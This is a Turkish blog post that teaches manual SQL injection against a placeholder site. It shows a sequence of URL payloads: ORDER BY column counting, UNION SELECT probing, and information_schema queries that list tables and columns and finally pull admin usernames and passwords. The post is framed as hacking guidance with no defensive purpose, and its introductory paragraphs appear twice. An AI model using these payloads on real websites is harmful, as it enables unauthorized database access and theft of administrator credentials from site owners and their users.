Manuel Sql İnjection,sql injection,gelişmiş sql injection,manuel sql enjeksiyon,elle sql hack,hack,sql.
Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.
Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.
Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.
Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.
Ama o programları yazan kişiler sql hakkında baya bilgili kişiler olduğu için manuel sql size onların programından daha etkisiz gelebilir.Ama öyle değildir ileri düzey düşüneceğiz ve "ileri düzey sql injection" ile o programların çekemediği bilgileri çekeceğiz.
öncelikle sitemizde sql injection açığının olduğundan emin olmalıyız.
order by 1 diyoruz ve "1" i sırayla arttırıyoruz mesela diyelim order by 8 yaptık site normal açıldı ama order by 9 yapınca bozulduysa bu sitede 8 tane kolon vardır.
hedefsite.com/index.php?id=1 order by 1
ardından union select 1,2,3,4,5,6,7,8 --> 8 kolon olduğu için 8'e kadar.
böyle yapınca ekrana bakıyoruz herhangi bir sayı arıyoruz bu sitede 2 sayısı yansıdı o zaman sql komutlarını 2 sayısını silip orada çalıştırabiliriz.
hedefsite.com/index.php?id=1union select 1,2,3,4,5,6,7,8
union select 1,Database(),3,4,5,6,7,8 bu sitemizin database ismi :)
hedefsite.com/index.php?id=1 union select 1,Database(),3,4,5,6,7,8
union select 1,version(),3,4,5,6,7,8 buda sitenin versiyonu eğer 5 ve üstü ise bu kodları çalıştıracağız ama eğer 4 ise hiç ugrasmayın :)
union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables --> "information_schema" her sitede bulunur bizim db ye ulaşmamızı sağlar. bu kod ile tabloları istedik
hedefsite.com/index.php?id=1 union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables
union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns bu kod ile kolonları istedik
hedefsite.com/index.php?id=1 union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns
union select 1,kolon adı,3,4,5,6,7,8 from tablo adı admin bilgilerinin olduğu tablodan kolonları yansıtmasını istedik :) ve admin username ve password :)
Hiç yorum yok:
Yorum Gönder